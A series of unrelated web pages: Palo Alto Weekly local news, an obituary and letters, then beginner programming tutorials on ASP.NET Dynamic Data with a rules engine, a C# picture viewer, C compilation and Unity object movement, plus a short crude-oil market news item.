He joined Exxon Corporation as a project manager for developing technologies to extract oil from the ground and from the ocean floor. His work took him all over the world, including Japan; England; Australia; Norway; Venezuela; Laguna Beach, California; New Jersey; and Houston, Texas. After retiring from Exxon in 1986, he worked for a hazardous waste cleanup business in Washington and then ran his own consulting firm.

In 1996, Robin and Carolyn moved to Palo Alto, where Carolyn had lived many years. Robin became an enthusiastic citizen. He helped raise funds for the Palo Alto History Museum and was a Board member and president of Abilities United (formerly C.A.R.), an organization that provides services for people with disabilities. In 2003 he was elected to the Palo Alto Fellowship Forum and was its president from 2010 to 2011. He served twice as president of the 101 Alma Condominium Association.

Robin loved tennis, skiing, bridge, reading, crossword puzzles, and poker. His colleagues at his weekly poker game warned newcomers that despite Robin's friendly good humor, he almost always came away a winner. His friend Tom Ehrlich said, "He certainly was a winner in life and will be missed by his family and friends whose solace is in the many warm memories, stories, and good deeds that he left behind."

A memorial service will be held on Monday, February 27, 2012 at 4pm at the First Congregational Church of Palo Alto, 1985 Louis Road at Embarcadero. Contributions in honor of Robin may be made to Abilities United, 525 E. Charleston Rd., Palo Alto, CA 94306 or to the Palo Alto History Museum, PO Box 676, Palo Alto, CA 94302.

PAID

Palo Alto residents have been picking up their mail and buying stamps at the downtown post office since 1932, but change is coming, and with the financial meltdown of the Postal Service, 380 Hamilton Ave. is likely to have a new owner before the year is out.
A solid majority of the City Council voted Tuesday to make sure the city is among the bidders when the service chooses who will buy the beautiful and historic 20,300-square-foot building that was designed by Palo Alto's own Birge Clark. The building's distinctive Spanish Colonial Revival style was a Clark trademark, which broke the rules laid down by postal officials at the time. Ultimately it became the first post office ever commissioned to be intentionally designed for the purpose, but was only accepted after the direct intervention of President Herbert Hoover, a friend of Clark's.

During Tuesday's presentation at City Hall, postal officials explained the service's acute nationwide financial problems, which are forcing the sale of Palo Alto's downtown post office and many other buildings elsewhere on the Peninsula and around the country. But while the Postal Service wants to downsize, the officials said they are not abandoning downtown Palo Alto, where they hope to lease about 3,500 square feet of commercial space, either in the old post office or within a few blocks of 380 Hamilton.

The council wisely directed its staff to appraise the property and begin evaluating eventual uses for the site, although it is far from clear whether it makes financial sense to purchase the property. The PF (public facility) zoning at the site must either house a public use or be rezoned for other uses, Planning and Community Environment Director Curtis Williams told the council. Any buyer would have to overcome many procedural hurdles and proceed with caution before modifying the building, which is listed on the city's inventory of historical buildings and the U.S. Department of Interior's National Register of Historic Places.

"`Gorgeous building' is historically significant to the city." - Palo Alto City Councilman Sid Espinosa

The restrictions would make it difficult to use the building for a private, profit-making use, although it would not be impossible.
The council did not identify a funding source to purchase the building, which in an entirely off-the-cuff estimate, one local developer said could be worth about $6 million or more. The Postal Service is looking for a quick sale and is hoping to put the building on the market in May of this year. Many of the comments Tuesday spoke about the history and beauty of the building. Councilman Sid Espinosa said the post office is a "gorgeous building," that is historically significant to the city. He urged city staff members to consider "creative uses" for areas around the building, including the parking lot. The council ultimately adopted Councilwoman Gail Price's motion asking staff to appraise the site and consider "adaptive reuse concepts" and "planning strategies" for the site. On Tuesday the council did not focus on potential uses for the building, but back in December Councilman Pat Burt said he would like to explore making it the site of the Development Center. The city's current center is located in leased space at 285 Hamilton, across the street from City Hall. Given the possibility that the building's zoning designation and historic rating could lower its price, the city should think creatively about uses for this one-of-a-kind Birge Clark building. One possibility that could help remedy the long-running and so far unsuccessful search for a public-safety building would be to move the downtown library to the post office, lease 3,500 square feet back to the Postal Service, and use the library building to house portions of the police department, which is located across the street. With its two prominent entrances, the post office could have its own access to the smaller branch post office, while the current library, or some other use compatible with the public facility zoning, could use the other. Regardless, this beautiful public building should be preserved and given a new life by the city, particularly if it can ease overcrowding at City Hall. 
Or it could be leased to a tenant who could work with the zoning profile. A good example of the city finding a new purpose for a large building is the Senior Center takeover of the old police station on Bryant Street. Although the police station was vacant for nearly 10 years, the city worked with a citizens group that raised more than $1 million in the early 1970s to refurbish the 16,000-square-foot building, which housed all the city's senior programs and continues to do so under the Avenidas banner. It is a good example of how historic city buildings like the post office can be given a new lease on life.

Spectrum: Editorials, letters and opinions

Compost facility feasibility

Editor,

Now that Measure E has opened the door to using 10 acres of parkland for a compost facility, residents must watch the city's actions closely to make sure that a decision is made quickly, and if the real financial merit of the plant is not feasible -- make sure that the parkland is rededicated. All concerned residents must insist that our leaders respond to the following questions:

1. How do we make sure that the "cost" (market value) of the 10 acres of real estate is fully accounted for in any financial feasibility study?

2. How do we assure that there is absolute integrity in all the assumptions used to evaluate the project (real financial merit vs. pipe dreams)?

3. How do we keep study costs to a minimum (i.e., if it is clear that the anaerobic digester does not meet financial return goals, stop the detailed study and return the parkland)?

Without this scrutiny, we will spend money and delay a precious park resource without delivering any value. Watchdog efforts like these are bad news for those hoping that there might be a loophole to convert the land to another purpose once the memory of implied promises has faded.
That promise: The city will provide an innovative composting plant that returns a positive financial return (including the market value of the land) or return it to parkland and proceed with the long-delayed recreational vision for our waterfront. Got accountability? Compost or get off the pot.

Timothy Gray
Park Boulevard

Electrify Caltrain

Editor,

The latest sugar in the California High Speed Rail Authority boondoggle is to provide electrification for the Peninsula Caltrain system. Back in 2000, Santa Clara County voters approved Measure A, which extended the 1996 sales tax for the BART extension, but also for Caltrain electrification. The Palo Alto Chamber of Commerce got on board, so to speak, since electrification promised fast, frequent and quiet Caltrain. That was the sugar for Measure A. Bottom line: We were promised electrification once in Measure A and now for high-speed rail. This is doubling down on bait and switch.

Chop Keenan
Keenan Land Co.
Palo Alto

La Comida has been serving delectable and affordable meals to seniors since 1972. 450 Bryant Street, Downtown Palo Alto. La Comida Dining Room: (650) 322-3742. Current menu: LaComida.org/menu.aspt. South Palo Alto location for a La Comida hot lunch: Stevenson House, 455 E. Charleston. Phone: 494-1944 Ext. 10.

...warily living underfoot of us human "beans," and stealthily "borrowing" what they need to survive. But it's also a reminder that the seemingly small package of a hand-drawn animated film remains a warmly welcome alternative to the often cold equivalent.

...Network, "The Vow" might have been the result.
Fortunately, leads Rachel McAdams ("Midnight in Paris") and Channing Tatum ("Haywire") serve up solid performances and help keep the film somewhat grounded despite its proclamations about love and loyalty. The fledgling marriage between young...

A&E DIGEST

REEL LOCALS ... Two Palo Alto filmmakers are among the artists represented in this year's San Francisco International Asian American Film Festival, which has screenings next month in San Francisco, San Jose and Berkeley. Director Laura Green, who recently graduated from Stanford University, will screen her short documentary "Lady Razorbacks," about a group of Pacific Islander women starting a rugby team in East Palo Alto. That film will be shown March 10 and 15. Meanwhile, director Tanuj Chopra shows the narrative feature "Nice Girls Crew" on March 10 and 17. It's described as a "raunchy" tale of three childhood friends linking up again through a book club. For details about the film festival, which is in its 30th year, go to festival.caamedia.org/30/.

Little Arrietty (voiced by Bridgit Mendler) encounters a cat in "The Secret World of Arrietty."

...resources to saving the whales. ... six minutes. -- T.H. (Reviewed Nov. 25, 2011)

A Separation (Guild): Even as she defends her divorce filing, an Iranian woman says of her spouse, "He is a good, decent person." But "A Separation" -- Iran's entry for Oscar -- ... quietly. Though the characters may not live in glass houses, it's a shattered windshield that attends the film's moment of truth.

Lunch Monday-Friday 11 AM - 2 PM; Dinner Monday-Sunday 5 PM - 9 PM; 408 California Ave., Palo Alto; 328-8840

...somehow, Stanford not only survived, but thrived. When the marathon trip concluded, the Cardinal (11-2 overall) was No. 1 in the nation.

Senior Brad Lawson is a returning All-American who missed much of the fall with an injury. He's healthy and back leading the Cardinal.
Senior tri-captain Will Cabral has played heads up this season.

Keith Peters

Senior tri-captain Edgardo Molina (14) leads the Bears in scoring and has helped them to a No. 23 national ranking.
http://issuu.com/paloaltoweekly/docs/2012_02_24.paw.section1?viewMode=magazine&mode=embed
.NET From a Markup Perspective

In this post, I will show how to use the Windows Workflow Foundation rules engine to provide business logic for a Dynamic Data Entities Web Application. We will show how to change business rules without modifying code, drive the application based on a logical entity model, and map the entity model to a data store. I have to admit that I am in awe of how easy this was to do.

To start, open Visual Studio 2008 with SP1 installed and create a new Dynamic Data Entities Web Application. This will generate what seems at first to be a lot of code, but once you peek under the hood you will see that it's really just templating code that you have full control over. I'm not going to explain all of Dynamic Data here; for more information you should check out the great getting-started video series available at.

Once you create the web application, add a new ADO.NET Entity Data Model. I named mine "Northwind.edmx". When prompted, click OK to add the asset to the App_Code folder. Next, a wizard pops up asking you what the model should contain. I chose "Generate from database" and used the Northwind database, choosing the Customers, Orders, and Order_Details tables.

Once you have the model created, you need to wire it up to the application. Before we do this, make sure you download the Dynamic Data Entity Framework Workaround. In your ASP.NET web application, right-click and choose "Add ASP.NET Folder" and choose "Bin". Then copy the workaround DLL into your Bin directory. We use this DLL to wire up the model to our dynamic data application. Open Global.asax and find the commented line starting with model.RegisterContext and change it to:

model.RegisterContext(new Microsoft.Web.DynamicData.EFDataModelProvider(typeof(NorthwindModel.NorthwindEntities)), new ContextConfiguration() { ScaffoldAllTables = true });

The other change I made was to update the route.
Instead of using Edit.aspx for edits, I wanted to use ListDetails.aspx for a master/detail view, which also lets me use the GridView control. I edited the Global.asax to the following.

<%@ Application Language="C#" %>
<%@ Import Namespace="System.Web.Routing" %>
<%@ Import Namespace="System.Web.DynamicData" %>
<script RunAt="server">
    public static void RegisterRoutes(RouteCollection routes)
    {
        MetaModel model = new MetaModel();
        model.RegisterContext(
            new Microsoft.Web.DynamicData.EFDataModelProvider(typeof(NorthwindModel.NorthwindEntities)),
            new ContextConfiguration() { ScaffoldAllTables = true });

        routes.Add(new DynamicDataRoute("{table}/ListDetails.aspx")
        {
            Action = PageAction.Details,
            ViewName = "ListDetails",
            Model = model
        });
    }

    void Application_Start(object sender, EventArgs e)
    {
        RegisterRoutes(RouteTable.Routes);
    }
</script>

You should be able to hit F5 and have a working application so far (make sure to set Default.aspx as the startup page for the web application).

There's probably a more elegant way to do this, but I needed a way to signal whether an entity is valid and also to trap the validation message for the entity. The easiest way to do this is to create a partial type for your entity class and add 2 properties, Valid and ValidationMessage. We'll use these properties from our rules engine.

namespace NorthwindModel
{
    public partial class Customers : EntityObject
    {
        public bool Valid { get; set; }
        public string ValidationMessage { get; set; }
    }
}

In hindsight, I probably could've created a common interface and used it for all of the entities. There might even be something there for Entity Framework and Dynamic Data to automatically add this type of error in; I'll leave investigation of this approach as an exercise to the reader.

The next step is to deploy the web application. Right-click on the web project and choose "Publish Web Site".
In that screen, I checked "Emit debug information" because I wanted to make sure that I could step through the types during debugging. Make sure to note the directory where you published the web site to; you will need this directory in a subsequent step.

The next step is to download the External Ruleset Demo from the MSDN RuleSet Sample in the SDK. This is a fantastic demo application for Windows Workflow Foundation that allows you to use the Windows Workflow Foundation rules engine in your application without using workflows. Download the package and then run Setup.bat to create the Rules database. Next, load up the ExternalRuleSetToolKit.sln into Visual Studio 2008 to convert the application from Visual Studio 2005 to Visual Studio 2008 format. Once that's done, hit F5 to run the solution.

Once the RuleSetTool application is running, click the New button. This will create a new ruleset. Give it a name (I called mine "ValidateCustomer"). On the top right of the form, there is a button to browse to a selected workflow or type. Click that browse button, then click browse again on the resulting "Workflow/Type Selection" dialog, and browse to the location of your published web application. Under that folder, choose "App_Code.dll". After selecting the App_Code.dll, the dialog will show you a list of contained types and their members. I chose the "NorthwindModel.Customers" entity type that was generated by the Entity Framework designer. Once you select the type and click OK, the final screen looks like this.

The next thing to do is to add your rules. This was the part where I stepped back and said "whoa, I can't believe this is so easy". Click the "Edit Rules" button. This is where you will actually define rules. For instance, I added a rule "AddressIsValid" where I check to see if the Address is null or empty. If it is, then I set Valid to false and set the ValidationMessage property to "Address is missing."
Similarly, I added a rule that checks the CompanyName to see if it contains a specific value and sets Valid and ValidationMessage appropriately. Once you define the rules, click OK. On the main form, go to the "Rule Store" menu item and click Save.

This one took a while for me to find because I am not very familiar with Entity Framework. A quick search yielded "How to: Execute Business Logic When Saving Changes". This is where we evaluate the rules in our application. Create a partial class for the context type. Add a partial method OnContextCreated that provides a handler for the SavingChanges event. In this event handler, add the following code.

public partial class NorthwindEntities
{
    partial void OnContextCreated()
    {
        this.SavingChanges += new EventHandler(NorthwindEntities_SavingChanges);
    }

    void NorthwindEntities_SavingChanges(object sender, EventArgs e)
    {
        // Validate the state of each entity in the context
        // before SaveChanges can succeed.
        foreach (ObjectStateEntry entry in
            ((ObjectContext)sender).ObjectStateManager.GetObjectStateEntries(
                EntityState.Added | EntityState.Modified))
        {
            // Find an object state entry for a Customers object.
            if (!entry.IsRelationship && (entry.Entity.GetType() == typeof(Customers)))
            {
                Customers customerToCheck = entry.Entity as Customers;
                customerToCheck.Valid = true;

                RuleSetService svc = new RuleSetService();
                RuleSet ruleset = svc.GetRuleSet(new RuleSetInfo("ValidateCustomer"));
                RuleExecution exec = new RuleExecution(
                    new RuleValidation(customerToCheck.GetType(), null), customerToCheck);
                ruleset.Execute(exec);

                if (!customerToCheck.Valid)
                    throw new ArgumentException(customerToCheck.ValidationMessage);
            }
        }
    }
}

Note that this is where the Valid and ValidationMessage properties come into play. We use these to determine whether the rules failed and subsequently throw an exception. This is how we signal to our application that there are business logic errors above the field validation that we get through Dynamic Data and Entity Framework.
However, now we have a problem... we need to handle the error in the application. This took me a while to figure out, but the answer was really easy. When in doubt, steal, er, borrow someone else's code! While researching how to handle asynchronous postback errors, I stumbled upon an example, modified it slightly, and ended up with the following code. Open the master page, Site.master, and modify it to include script to handle the error.

<%@ Master Language="C#" CodeFile="Site.master.cs" Inherits="Site" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<html xmlns="">
<head runat="server">
    <title>Dynamic Data Site</title>
    <link href="~/Site.css" rel="stylesheet" type="text/css" />
</head>
<body class="template" id="bodytag">
    <h1><span class="allcaps">Dynamic Data Site</span></h1>
    <div class="back">
        <a runat="server" href="~/"><img alt="Back to home page" runat="server" src="DynamicData/Content/Images/back.gif" />Back to home page</a>
    </div>
    <form id="form1" runat="server">
        <script type="text/javascript" language="javascript">
            var divElem = 'AlertDiv';
            var messageElem = 'AlertMessage';
            var errorMessageAdditional = 'Please try again.';
            var bodyTag = 'bodytag';

            Sys.WebForms.PageRequestManager.getInstance().add_endRequest(EndRequestHandler);

            function ToggleAlertDiv(visString) {
                if (visString == 'hidden') {
                    $get(bodyTag).style.backgroundColor = 'white';
                }
                else {
                    $get(bodyTag).style.backgroundColor = 'yellow';
                }
                var adiv = $get(divElem);
                adiv.style.visibility = visString;
            }

            function ClearErrorState() {
                $get(messageElem).innerHTML = '';
                ToggleAlertDiv('hidden');
            }

            function EndRequestHandler(sender, args) {
                if (args.get_error() != undefined && args.get_error().httpStatusCode == '500') {
                    var errorMessage = args.get_error().message;
                    args.set_errorHandled(true);
                    ToggleAlertDiv('visible');
                    $get(messageElem).innerHTML = '"' + errorMessage + '" ' + errorMessageAdditional;
                }
            }
        </script>
        <div id="AlertDiv" style="visibility:hidden">
            <div id="AlertMessage" style="color:Red">
            </div>
        </div>
        <div>
            <asp:ScriptManager runat="server" />
            <asp:ContentPlaceHolder runat="server">
            </asp:ContentPlaceHolder>
        </div>
    </form>
</body>
</html>

The modifications I made include getting rid of the "clear" button, changing the background color to yellow, and changing the error font to red. Now, when an error occurs, the background is altered to signal to the user that there was a problem. This also leaves the ASP.NET GridView in edit mode.

One problem, though... how do we clear the error? This stumped me for a while, until I came across the obvious solution. Simply add an onclick handler to the GridView in ListDetails.aspx.cs.

protected void OnGridViewDataBound(object sender, EventArgs e)
{
    if (GridView1.Rows.Count == 0)
    {
        DetailsView1.ChangeMode(DetailsViewMode.Insert);
    }
    GridView1.Attributes.Add("onclick", "ClearErrorState()");
}

This is what is so cool... the whole application took me hardly any time at all, and now I have business rules externalized from a fully functional application. When I click on the Customers entity, I have a grid of customers. Click edit, and change one of the values to have the rules engine set the Valid property to false. This causes the background to turn yellow and the error to display in a red font.

What's also incredibly cool is the user experience. The row is left in edit mode, the background is yellow, the font is red. The user just clicks anywhere in the GridView, and the background returns to white and the error message goes away.

Now, here's what blows me away. With the web app still running, run the RuleSetToolkit project again and change the rule. For instance, I changed the IsCompanyValid rule to check that any customer with a country other than "United States" must also have a "Region" value. Update the same record again, choosing a country other than United States, and the application will show another error.
Because the rules are externalized from the application, they can be changed on the fly without modifying your code.

I'll admit that it took me about 2 hours to put this together in the middle of phone calls and having to research stuff. I just don't get to code as much these days and my skills are rusty. However, now that I have learned how to do everything, I can put the whole site together in about 6 minutes. I should do the whole thing as a screencast just to show how little effort is involved.

Resources:
- Dynamic Data Entity Framework Workaround
- External RuleSet Demo
- How to: Execute Business Logic When Saving Changes
- System.Web.UI.ScriptManager.OnAsyncPostBackError
http://blogs.msdn.com/kaevans/archive/2008/11/07/using-asp-net-dynamic-data-with-the-windows-workflow-foundation-rules-engine.aspx
The source tutorial: Msdn.microsoft.com

The tutorial steps have been condensed here, so you can build this program a lot faster. To make programs in C#, first you'll need Micro$oft Visual C# 2010 Express: Microsoft.com
Direct link: Download.microsoft.com

After installation, note the difference between the terms "solution" and "project":
- a solution can hold many projects
- a project can hold many files
Projects can be compiled (made into actual programs) separately. Also remember to save often during this tutorial (CTRL + S, or the Save icon shown below in the picture).

How to make a picture viewer?

1. Run Visual C# 2010.
2. Select New Project, select Windows Forms Application.
3. Name it PictureViewer.
4. Click the Save All icon to save the whole solution.
5. Name and Solution Name should be e.g. PictureViewer.
6. Press F5 on the keyboard to compile and run the program to see it.
7. Close your program window.
8. In C# Express, select your window/form so it's active and its properties are displayed.
9. Set the Text property to Picture Viewer (with a space between; it's allowed).
10. Set the Size property to 550, 350.
11. Choose from the Toolbox a container called TableLayoutPanel; double-click it.
12. Select this TableLayoutPanel, so its properties (and not the main form's) are displayed.
13. Select its Dock property and set it to the middle.
14. Click the triangle/arrow of your TableLayoutPanel (in the upper right corner) to display TableLayoutPanel Tasks.
15. Select Edit Rows and Columns.
16. In Column and Row Styles set Column1 to 15%, and Column2 to 85%, then next to "Show:" choose Rows.
17. Set Row1 to 90%, and Row2 to 10%, and click OK.
18. From the Toolbox, category Common Controls, add a PictureBox.
19. Select PictureBox Tasks, click Dock in Parent Container.
20. Change the PictureBox ColumnSpan property to 2.
21. Make sure the TableLayoutPanel is selected in Properties, and not the PictureBox.
22. Add a CheckBox from Common Controls in the Toolbox.
23. Change the CheckBox's Text property to Stretch.
24. Add a FlowLayoutPanel from Toolbox/Containers.
25. Dock it in Parent Container.
26. Make sure the FlowLayoutPanel is selected (see the Properties section at the side).
27. Add four buttons from Toolbox/Common Controls/Button.
28. Select each button, and set their Text (TEXT, NOT NAME!) properties as follows:
   button1 -> Select a picture
   button2 -> Clear the picture
   button3 -> Set the background colour
   button4 -> Close
29. Hold the CTRL key (on the keyboard) and select each button, go to the Properties section, and set the AutoSize property to True.
30. Deselect all buttons by clicking elsewhere, then click each button separately, and change their Name property (this time the NAME property, not Text):
   button1 -> selectButton
   button2 -> clearButton
   button3 -> backgroundButton
   button4 -> closeButton
31. Double-click each existing button in the form (not the Toolbox), plus double-click the checkbox, to insert the appropriate code into the editor. You should see the following code:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;

namespace PictureViewer2
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void selectButton_Click(object sender, EventArgs e)
        {
        }

        private void clearButton_Click(object sender, EventArgs e)
        {
        }

        private void backgroundButton_Click(object sender, EventArgs e)
        {
        }

        private void closeButton_Click(object sender, EventArgs e)
        {
        }

        private void checkBox1_CheckedChanged(object sender, EventArgs e)
        {
        }
    }
}

32. Go to Toolbox/Dialogs, choose ColorDialog and OpenFileDialog (double-click to add them).
33. Change OpenFileDialog1's Filter property to:
JPEG Files (*.jpg)|*.jpg|PNG Files (*.png)|*.png|BMP Files (*.bmp)|*.bmp|All files (*.*)|*.*
(CTRL + C to copy this text, and then CTRL + V to insert it there in the Filter property box.)
34. Change the Title property to Select a picture.
35. Now you need to go to the Form1.cs tab (not Form1.cs [Design]!), and write some new code:

private void selectButton_Click(object sender, EventArgs e)
{
    if (openFileDialog1.ShowDialog() == DialogResult.OK)
    {
        pictureBox1.Load(openFileDialog1.FileName);
    }
}

private void clearButton_Click(object sender, EventArgs e)
{
    pictureBox1.Image = null;
}

private void backgroundButton_Click(object sender, EventArgs e)
{
    if (colorDialog1.ShowDialog() == DialogResult.OK)
        pictureBox1.BackColor = colorDialog1.Color;
}

private void closeButton_Click(object sender, EventArgs e)
{
    this.Close();
}

private void checkBox1_CheckedChanged(object sender, EventArgs e)
{
    if (checkBox1.Checked)
        pictureBox1.SizeMode = PictureBoxSizeMode.StretchImage;
    else
        pictureBox1.SizeMode = PictureBoxSizeMode.Normal;
}

36. Press F5 to run your program, and test it all out!

That's all it takes to make a simple picture viewer quickly. For more information and explanations you can go here: Msdn.microsoft.com
https://www.moddb.com/groups/curly-bracket-programming-realm/tutorials/c-how-to-make-a-picture-viewer-program
Lecture 10

What will I learn in this lecture?
• What is the difference between machine code and C?
• Why use C?
• How do the executions of C and Matlab programs differ?
• What are three methods of expressing a program algorithm?

Related Chapters: FER Chapters 1 & 2

Digital Computer Hardware

[Diagram: input devices and output devices connect to the system unit, which contains the CPU (the Control Unit (CU) and the Arithmetic-Logic Unit (ALU)), main memory (RAM) with numbered memory addresses (e.g., instr1 at addresses 0-3, instr2 at 4-7, the value 101.101 at 100-107, -75 at 108-109, a label at 110-121), and auxiliary storage.]

Main (Internal) Memory:
• All data and instructions are stored in main memory as a sequence of 0's and 1's called bits (binary digits).
• A byte (the smallest addressable element of memory) is the storage size for one character of information (ASCII-8: 8 bits). Every (single) address refers to a byte in memory.

Instruction Cycle

[Diagram: the CPU repeats a four-step cycle against main memory: 1) Fetch, 2) Decode, 3) Execute, 4) Store. Fetch and decode form the instruction cycle in the Control Unit; execute and store form the execution cycle in the Arithmetic/Logic Unit. The CPU includes cache (very fast memory).]

Programming languages are classified as:
• Machine Language (binary-based code; machine dependent)
• Assembly Language (mnemonic form of machine language)
• High-Level Languages
  - Closer to natural languages
  - Generally, machine independent
  - Usually, several machine instructions are combined into one high-level instruction
  - Examples: FORTRAN, COBOL, BASIC, Java

To illustrate differences in syntax between the language levels, consider how a computer could be instructed to subtract two numbers stored in memory address locations 64 and 2048 and put the result in location 2048:

Variable Name | Memory Address
increment     | 64
value         | 2048

• Machine Language: 0111110000000100000000100000000000 (6-bit OpCode, 14-bit address fields with values 64 and 2048)
• Assembly Language: S increment,value
• C Language: value = value - increment;

Processing a High-Level Language Program

Programs written in high-level languages must be converted to machine language. Two approaches:
(1) Compilation (see p. 28, FER Figure 2.4) — used with C, C++, Fortran, ...
(2) Interpretation — used with Matlab, Visual Basic, ...

Step 1) Use an editor to create a "source" file. We will name source files with the suffix ".c".
Step 2) Run the gcc compiler on the source file to create an executable or object file with the default name a.out. For CS101 we will only create executable files.
Step 3) Check to see if gcc caught any syntax errors; if so, go back to Step 1.
Step 4) Run the program by typing > a.out at the Unix prompt.

Computer programming is the art/science of transforming a "real world" problem into a finite sequence of instructions (statements) in a computer language. The method stated below will be used throughout the rest of the semester. Follow this method in your labs and for any Machine Problem.

Software Development Method (these vary just slightly from the method described on p. 37 in FER)
1. Requirements Specification (Problem Definition)
2. Analysis---refine, generalize, decompose the problem definition (i.e., identify sub-problems, I/O, etc.)
3. Design---develop an algorithm (the processing steps to solve the problem) using one of the following: a natural-language algorithm, a flowchart algorithm, or a pseudo-code algorithm
4. Implementation---write the "program" (code)
5. Verification and Testing---test and debug the code

1. Requirements Specification (Problem Definition)
Given a light-bulb with a pre-measured power consumption (in watts), compute the resistance (in ohms) of the bulb.

2. Analysis---refine, generalize, decompose the problem definition (i.e., identify sub-problems, I/O, etc.)
Input = a real number representing power
Output = a real number representing resistance

3. Design---Natural-Language Algorithm
Prompt the user for the power dissipation. Read power and store the value in a storage location called power. Compute the resistance by solving the formula "power = (voltage * voltage) / resistance" in terms of resistance: resistance = (voltage * voltage) / power. Print out the value stored in location resistance.

3. Design---Pseudo-code Algorithm
print "enter power in watts"
read power
resistance = (117.0 * 117.0) / power
print resistance

3. Design---Flowchart Algorithm
start -> Output: "enter power in watts" -> Input: power -> Compute: resistance = (117 * 117) / power -> Output: resistance -> stop
(Flow is assumed downward unless otherwise specified with an arrow. A trapezoid designates I/O. A rectangle designates one or more statements in a block. A circle is used as a continuation symbol for transfer to another page.)

4. Implementation---write the "program" (code)
The lecture slides show the use of the Xemacs editor, but the choice of editor is not critical. In labs we will use the Eclipse editor.

C code implementation of the algorithm:

/* C program to compute the resistance */
/* of a light-bulb.                    */
#include <stdio.h>
#define VAC 117.0
void main(void)
{
    /* Declare variables. */
    float power, resistance;

    /* Request user input: power of the light-bulb in watts. */
    printf("Please enter power(watts) :");

    /* Read the value power. */
    scanf("%f", &power);

    /* Compute resistance assuming VAC = 117. */
    resistance = (VAC * VAC) / power;

    /* Output the calculated resistance. */
    printf("Resistance is %f (ohms)\n", resistance);
}

(Note the indentation scheme in the above code.)

C program compilation

Click the "Save" button in Xemacs to save your code, but don't close the Xemacs window. Click the xterm button to open another window. Use the "gcc" program to compile your C source code in the file "resistance.c".

> ls
resistance.c  resistance.c~

Note: backup files begin and/or end with a ~ or a # symbol. Do not edit or compile these files!

> gcc resistance.c

The "gcc" program will not alter the file "resistance.c". The output of "gcc" is by default contained in the file "a.out". The file "a.out" is called an executable file.

Note that the "gcc" program reported an error on line 16 in the program, and "gcc" generated a warning for line 7. Also, note that there is no a.out file listed. Errors cause gcc to abort, and you will not get an a.out file. Go back to Xemacs line 16 and fix the syntax error.

The error on line 16 was actually caused by a missing semicolon on line 14. In C, a semicolon means "end of statement". This differs from Matlab, where a semicolon means "suppress output" and is optional. Since there was no semicolon after line 14, C assumed that lines 14-16 represented one C statement. That is incorrect syntactically, so gcc (the compiler program, or compiler for short) generated an error message and terminated before producing an a.out file. After adding a semicolon to the end of line 14, click "Save" in Xemacs, go back to the xterm, and type again.

Note: the dot-slash in "./a.out" means "in this working directory". If you type "a.out" at the Unix prompt, Unix will first search your home directory for a file "a.out". Of course this would not be the same "a.out" file you created in another directory.

What have I learned in this lecture?

A CPU only executes machine code, which consists of instructions that are specific to a particular manufacturer. The machine code is a sequence of ones and zeros. The C language is more human-language-like than machine code and can be converted to machine code by using a compiler (gcc in CS101). C code is more portable than machine code. In the design and development of an algorithm we can use any combination of "natural language", "pseudo-code", and "flowchart". Matlab code is executed by means of an interpreter that is running in the Matlab "environment". Each time the Matlab code runs, the interpreter converts the code into machine code. C code is compiled into an executable file (machine code) once. We then run the program (default name a.out) by typing the name of the executable file (a.out) at the Unix prompt.
https://www.slideserve.com/Faraday/lecture-10-10-2-what-is-the-difference-between-machine
06 September 2012 11:44 [Source: ICIS news]

SINGAPORE (ICIS)--Crude futures rose on Thursday, climbing by more than $1/bbl at one stage, on expectations that the European Central Bank (ECB) will reveal plans for a new bond purchasing programme to address the eurozone debt crisis.

At 10:25 GMT, October Brent crude was trading higher, while October NYMEX light sweet crude futures (WTI) were trading at $96.42/bbl, up by $1.06/bbl from the previous close.

ECB president Mario Draghi is expected to announce plans to buy bonds of the heavily debt-laden eurozone nations. Borrowing costs for 10-year Spanish bonds are presently around 6.42%.

Traders also await the release of US August employment data on Friday. Weak data may encourage the US Federal Reserve to consider a further round of quantitative easing to stimulate the economy.
http://www.icis.com/Articles/2012/09/06/9593154/crude-futures-rise-1bbl-on-hopes-over-ecb-measure.html
In the last article, I gave you a short introduction to scripting in Unity. Now let's take that a bit further by making our player move when the game begins! We'll discuss vectors, translations, and framerate independence.

Translating Game Objects

First I'll take you through the steps to move our player automatically, and then we will break down how it works. To get started, let's take a look at the Unity transform documentation. Remember, you can quickly access contextual documentation from the inspector by clicking the question button. Now click the "Switch to Scripting" button near the top. Now scroll down and take a look at the public methods available to us on the transform. We want to move the player GameObject along the X and Y axes. Let's check out the details of the Translate method.

The docs say Translate "Moves the transform in the direction and distance of translation", which is precisely what we want. Since we want the player to move every frame, we need to use the Update method, which is called every frame of the game loop (typically 30 or 60 frames per second).

First, let's have the player move toward the right of the screen. Open the Player.cs file in your favorite code editor and add a call to Translate from the transform, providing a vector with the value of X as 1 (0 for Y and Z).

// Update is called once per frame
void Update()
{
    transform.Translate(new Vector3(1, 0, 0));
}

Remember, the Vector3 class also has several static members that we can use for common scenarios such as this. Let's change this to use Vector3.right instead.

// Update is called once per frame
void Update()
{
    transform.Translate(Vector3.right);
}

Now let's see what happens when we start the game in Unity. Whoa, that was fast! Our player cube should have moved automatically to the right and off the screen. Congrats on creating movement in your first game! It seems like magic for one line of code to accomplish movement like this.
You might be wondering exactly what this line is doing; how does it work? Let's break it down.

How Translation Works

To reiterate, we do not call the Update method ourselves; it is called by Unity (the engine) for every frame of our game. This is important to grasp, because it means any code we place inside the Update method will be executed 30, 60, or more times every second. Through Vector3.right, we're providing the Translate method the values 1 for X, and 0 for Y and Z. For every call to Update, we are telling the transform to translate from its current position by 1 on the X axis, and 0 on the Y and Z axes.

What does a value of 1 represent in this context, though? By default in Unity, 1 unit is a meter. That's what the Translate method does: it translates the GameObject/transform by the vector you provide, which gives it the direction and distance to move.

How then would we move to the left? Of course, we could use Vector3.left instead of Vector3.right, but why does that translation work? Exactly! Moving left means using a vector with an X value of -1, which subtracts 1 from the X position.

Wait, if the player is supposed to be moving 1 unit or meter every second, why did the player move so fast? It's time we talk about framerate independence.

Framerate Independence

For you, the player may have moved off screen in less than a second after starting the game. If we were to play on a slower machine, each frame would take longer to execute, slowing down the speed of the player. Yikes! We don't want the speed of our game object's movement to differ based on the speed of the machine the game is running on. What a terrible experience that would be, especially for multiplayer games!

The problem is that our code is currently framerate dependent. We're not taking into account the time it takes for each frame to complete.
